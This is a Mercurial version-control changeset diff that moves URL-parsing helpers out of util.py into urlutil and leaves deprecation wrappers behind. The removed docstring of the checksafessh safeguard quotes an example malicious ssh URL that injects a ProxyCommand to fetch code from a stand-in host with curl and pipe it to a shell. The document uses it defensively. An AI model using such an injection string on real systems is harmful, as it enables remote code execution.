mercurial/util.py
changeset 46907 ffd3e823a7e5
parent 46903 856820b497fc
child 46926 9c3e84569071
--- a/mercurial/util.py	Sun Apr 11 23:54:35 2021 +0200
+++ b/mercurial/util.py	Mon Apr 12 03:01:04 2021 +0200
@@ -28,7 +28,6 @@
 import platform as pyplatform
 import re as remod
 import shutil
-import socket
 import stat
 import sys
 import time
@@ -57,6 +56,7 @@
     hashutil,
     procutil,
     stringutil,
+    urlutil,
 )
 
 if pycompat.TYPE_CHECKING:
@@ -65,7 +65,6 @@
         List,
         Optional,
         Tuple,
-        Union,
     )
 
 
@@ -2959,420 +2958,52 @@
     return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
 
 
-def getport(port):
-    # type: (Union[bytes, int]) -> int
-    """Return the port for a given network service.
-
-    If port is an integer, it's returned as is. If it's a string, it's
-    looked up using socket.getservbyname(). If there's no matching
-    service, error.Abort is raised.
-    """
-    try:
-        return int(port)
-    except ValueError:
-        pass
-
-    try:
-        return socket.getservbyname(pycompat.sysstr(port))
-    except socket.error:
-        raise error.Abort(
-            _(b"no port number associated with service '%s'") % port
-        )
-
-
-class url(object):
-    r"""Reliable URL parser.
-
-    This parses URLs and provides attributes for the following
-    components:
-
-    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
-
-    Missing components are set to None. The only exception is
-    fragment, which is set to '' if present but empty.
-
-    If parsefragment is False, fragment is included in query. If
-    parsequery is False, query is included in path. If both are
-    False, both fragment and query are included in path.
-
-    See http://www.ietf.org/rfc/rfc2396.txt for more information.
-
-    Note that for backward compatibility reasons, bundle URLs do not
-    take host names. That means 'bundle://../' has a path of '../'.
-
-    Examples:
-
-    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
-    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
-    >>> url(b'ssh://[::1]:2200//home/joe/repo')
-    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
-    >>> url(b'file:///home/joe/repo')
-    <url scheme: 'file', path: '/home/joe/repo'>
-    >>> url(b'file:///c:/temp/foo/')
-    <url scheme: 'file', path: 'c:/temp/foo/'>
-    >>> url(b'bundle:foo')
-    <url scheme: 'bundle', path: 'foo'>
-    >>> url(b'bundle://../foo')
-    <url scheme: 'bundle', path: '../foo'>
-    >>> url(br'c:\foo\bar')
-    <url path: 'c:\\foo\\bar'>
-    >>> url(br'\\blah\blah\blah')
-    <url path: '\\\\blah\\blah\\blah'>
-    >>> url(br'\\blah\blah\blah#baz')
-    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
-    >>> url(br'file:///C:\users\me')
-    <url scheme: 'file', path: 'C:\\users\\me'>
-
-    Authentication credentials:
-
-    >>> url(b'ssh://joe:xyz@x/repo')
-    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
-    >>> url(b'ssh://joe@x/repo')
-    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
-
-    Query strings and fragments:
-
-    >>> url(b'http://host/a?b#c')
-    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
-    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
-    <url scheme: 'http', host: 'host', path: 'a?b#c'>
-
-    Empty path:
-
-    >>> url(b'')
-    <url path: ''>
-    >>> url(b'#a')
-    <url path: '', fragment: 'a'>
-    >>> url(b'http://host/')
-    <url scheme: 'http', host: 'host', path: ''>
-    >>> url(b'http://host/#a')
-    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
-
-    Only scheme:
-
-    >>> url(b'http:')
-    <url scheme: 'http'>
-    """
-
-    _safechars = b"!~*'()+"
-    _safepchars = b"/!~*'()+:\\"
-    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
-
-    def __init__(self, path, parsequery=True, parsefragment=True):
-        # type: (bytes, bool, bool) -> None
-        # We slowly chomp away at path until we have only the path left
-        self.scheme = self.user = self.passwd = self.host = None
-        self.port = self.path = self.query = self.fragment = None
-        self._localpath = True
-        self._hostport = b''
-        self._origpath = path
-
-        if parsefragment and b'#' in path:
-            path, self.fragment = path.split(b'#', 1)
-
-        # special case for Windows drive letters and UNC paths
-        if hasdriveletter(path) or path.startswith(b'\\\\'):
-            self.path = path
-            return
-
-        # For compatibility reasons, we can't handle bundle paths as
-        # normal URLS
-        if path.startswith(b'bundle:'):
-            self.scheme = b'bundle'
-            path = path[7:]
-            if path.startswith(b'//'):
-                path = path[2:]
-            self.path = path
-            return
-
-        if self._matchscheme(path):
-            parts = path.split(b':', 1)
-            if parts[0]:
-                self.scheme, path = parts
-                self._localpath = False
-
-        if not path:
-            path = None
-            if self._localpath:
-                self.path = b''
-                return
-        else:
-            if self._localpath:
-                self.path = path
-                return
-
-            if parsequery and b'?' in path:
-                path, self.query = path.split(b'?', 1)
-                if not path:
-                    path = None
-                if not self.query:
-                    self.query = None
-
-            # // is required to specify a host/authority
-            if path and path.startswith(b'//'):
-                parts = path[2:].split(b'/', 1)
-                if len(parts) > 1:
-                    self.host, path = parts
-                else:
-                    self.host = parts[0]
-                    path = None
-                if not self.host:
-                    self.host = None
-                    # path of file:///d is /d
-                    # path of file:///d:/ is d:/, not /d:/
-                    if path and not hasdriveletter(path):
-                        path = b'/' + path
-
-            if self.host and b'@' in self.host:
-                self.user, self.host = self.host.rsplit(b'@', 1)
-                if b':' in self.user:
-                    self.user, self.passwd = self.user.split(b':', 1)
-                if not self.host:
-                    self.host = None
-
-            # Don't split on colons in IPv6 addresses without ports
-            if (
-                self.host
-                and b':' in self.host
-                and not (
-                    self.host.startswith(b'[') and self.host.endswith(b']')
-                )
-            ):
-                self._hostport = self.host
-                self.host, self.port = self.host.rsplit(b':', 1)
-                if not self.host:
-                    self.host = None
-
-            if (
-                self.host
-                and self.scheme == b'file'
-                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
-            ):
-                raise error.Abort(
-                    _(b'file:// URLs can only refer to localhost')
-                )
-
-        self.path = path
-
-        # leave the query string escaped
-        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
-            v = getattr(self, a)
-            if v is not None:
-                setattr(self, a, urlreq.unquote(v))
-
-    def copy(self):
-        u = url(b'temporary useless value')
-        u.path = self.path
-        u.scheme = self.scheme
-        u.user = self.user
-        u.passwd = self.passwd
-        u.host = self.host
-        u.path = self.path
-        u.query = self.query
-        u.fragment = self.fragment
-        u._localpath = self._localpath
-        u._hostport = self._hostport
-        u._origpath = self._origpath
-        return u
-
-    @encoding.strmethod
-    def __repr__(self):
-        attrs = []
-        for a in (
-            b'scheme',
-            b'user',
-            b'passwd',
-            b'host',
-            b'port',
-            b'path',
-            b'query',
-            b'fragment',
-        ):
-            v = getattr(self, a)
-            if v is not None:
-                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
-        return b'<url %s>' % b', '.join(attrs)
-
-    def __bytes__(self):
-        r"""Join the URL's components back into a URL string.
-
-        Examples:
-
-        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
-        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
-        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
-        'http://user:pw@host:80/?foo=bar&baz=42'
-        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
-        'http://user:pw@host:80/?foo=bar%3dbaz'
-        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
-        'ssh://user:pw@[::1]:2200//home/joe#'
-        >>> bytes(url(b'http://localhost:80//'))
-        'http://localhost:80//'
-        >>> bytes(url(b'http://localhost:80/'))
-        'http://localhost:80/'
-        >>> bytes(url(b'http://localhost:80'))
-        'http://localhost:80/'
-        >>> bytes(url(b'bundle:foo'))
-        'bundle:foo'
-        >>> bytes(url(b'bundle://../foo'))
-        'bundle:../foo'
-        >>> bytes(url(b'path'))
-        'path'
-        >>> bytes(url(b'file:///tmp/foo/bar'))
-        'file:///tmp/foo/bar'
-        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
-        'file:///c:/tmp/foo/bar'
-        >>> print(url(br'bundle:foo\bar'))
-        bundle:foo\bar
-        >>> print(url(br'file:///D:\data\hg'))
-        file:///D:\data\hg
-        """
-        if self._localpath:
-            s = self.path
-            if self.scheme == b'bundle':
-                s = b'bundle:' + s
-            if self.fragment:
-                s += b'#' + self.fragment
-            return s
-
-        s = self.scheme + b':'
-        if self.user or self.passwd or self.host:
-            s += b'//'
-        elif self.scheme and (
-            not self.path
-            or self.path.startswith(b'/')
-            or hasdriveletter(self.path)
-        ):
-            s += b'//'
-            if hasdriveletter(self.path):
-                s += b'/'
-        if self.user:
-            s += urlreq.quote(self.user, safe=self._safechars)
-        if self.passwd:
-            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
-        if self.user or self.passwd:
-            s += b'@'
-        if self.host:
-            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
-                s += urlreq.quote(self.host)
-            else:
-                s += self.host
-        if self.port:
-            s += b':' + urlreq.quote(self.port)
-        if self.host:
-            s += b'/'
-        if self.path:
-            # TODO: similar to the query string, we should not unescape the
-            # path when we store it, the path might contain '%2f' = '/',
-            # which we should *not* escape.
-            s += urlreq.quote(self.path, safe=self._safepchars)
-        if self.query:
-            # we store the query in escaped form.
-            s += b'?' + self.query
-        if self.fragment is not None:
-            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
-        return s
-
-    __str__ = encoding.strmethod(__bytes__)
-
-    def authinfo(self):
-        user, passwd = self.user, self.passwd
-        try:
-            self.user, self.passwd = None, None
-            s = bytes(self)
-        finally:
-            self.user, self.passwd = user, passwd
-        if not self.user:
-            return (s, None)
-        # authinfo[1] is passed to urllib2 password manager, and its
-        # URIs must not contain credentials. The host is passed in the
-        # URIs list because Python < 2.4.3 uses only that to search for
-        # a password.
-        return (s, (None, (s, self.host), self.user, self.passwd or b''))
-
-    def isabs(self):
-        if self.scheme and self.scheme != b'file':
-            return True  # remote URL
-        if hasdriveletter(self.path):
-            return True  # absolute for our purposes - can't be joined()
-        if self.path.startswith(br'\\'):
-            return True  # Windows UNC path
-        if self.path.startswith(b'/'):
-            return True  # POSIX-style
-        return False
-
-    def localpath(self):
-        # type: () -> bytes
-        if self.scheme == b'file' or self.scheme == b'bundle':
-            path = self.path or b'/'
-            # For Windows, we need to promote hosts containing drive
-            # letters to paths with drive letters.
-            if hasdriveletter(self._hostport):
-                path = self._hostport + b'/' + self.path
-            elif (
-                self.host is not None and self.path and not hasdriveletter(path)
-            ):
-                path = b'/' + path
-            return path
-        return self._origpath
-
-    def islocal(self):
-        '''whether localpath will return something that posixfile can open'''
-        return (
-            not self.scheme
-            or self.scheme == b'file'
-            or self.scheme == b'bundle'
-        )
-
-
-def hasscheme(path):
-    # type: (bytes) -> bool
-    return bool(url(path).scheme)  # cast to help pytype
-
-
-def hasdriveletter(path):
-    # type: (bytes) -> bool
-    return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
-
-
-def urllocalpath(path):
-    # type: (bytes) -> bytes
-    return url(path, parsequery=False, parsefragment=False).localpath()
-
-
-def checksafessh(path):
-    # type: (bytes) -> None
-    """check if a path / url is a potentially unsafe ssh exploit (SEC)
-
-    This is a sanity check for ssh urls. ssh will parse the first item as
-    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
-    Let's prevent these potentially exploited urls entirely and warn the
-    user.
-
-    Raises an error.Abort when the url is unsafe.
-    """
-    path = urlreq.unquote(path)
-    if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
-        raise error.Abort(
-            _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
-        )
-
-
-def hidepassword(u):
-    # type: (bytes) -> bytes
-    '''hide user credential in a url string'''
-    u = url(u)
-    if u.passwd:
-        u.passwd = b'***'
-    return bytes(u)
-
-
-def removeauth(u):
-    # type: (bytes) -> bytes
-    '''remove all authentication information from a url string'''
-    u = url(u)
-    u.user = u.passwd = None
-    return bytes(u)
+def getport(*args, **kwargs):
+    msg = b'getport(...) moved to mercurial.utils.urlutil'
+    nouideprecwarn(msg, b'6.0', stacklevel=2)
+    return urlutil.getport(*args, **kwargs)
+
+
+def url(*args, **kwargs):
+    msg = b'url(...) moved to mercurial.utils.urlutil'
+    nouideprecwarn(msg, b'6.0', stacklevel=2)
+    return urlutil.url(*args, **kwargs)
+
+
+def hasscheme(*args, **kwargs):
+    msg = b'hasscheme(...) moved to mercurial.utils.urlutil'
+    nouideprecwarn(msg, b'6.0', stacklevel=2)
+    return urlutil.hasscheme(*args, **kwargs)
+
+
+def hasdriveletter(*args, **kwargs):
+    msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil'
+    nouideprecwarn(msg, b'6.0', stacklevel=2)
+    return urlutil.hasdriveletter(*args, **kwargs)
+
+
+def urllocalpath(*args, **kwargs):
+    msg = b'urllocalpath(...) moved to mercurial.utils.urlutil'
+    nouideprecwarn(msg, b'6.0', stacklevel=2)
+    return urlutil.urllocalpath(*args, **kwargs)
+
+
+def checksafessh(*args, **kwargs):
+    msg = b'checksafessh(...) moved to mercurial.utils.urlutil'
+    nouideprecwarn(msg, b'6.0', stacklevel=2)
+    return urlutil.checksafessh(*args, **kwargs)
+
+
+def hidepassword(*args, **kwargs):
+    msg = b'hidepassword(...) moved to mercurial.utils.urlutil'
+    nouideprecwarn(msg, b'6.0', stacklevel=2)
+    return urlutil.hidepassword(*args, **kwargs)
+
+
+def removeauth(*args, **kwargs):
+    msg = b'removeauth(...) moved to mercurial.utils.urlutil'
+    nouideprecwarn(msg, b'6.0', stacklevel=2)
+    return urlutil.removeauth(*args, **kwargs)
 
 
 timecount = unitcountfn(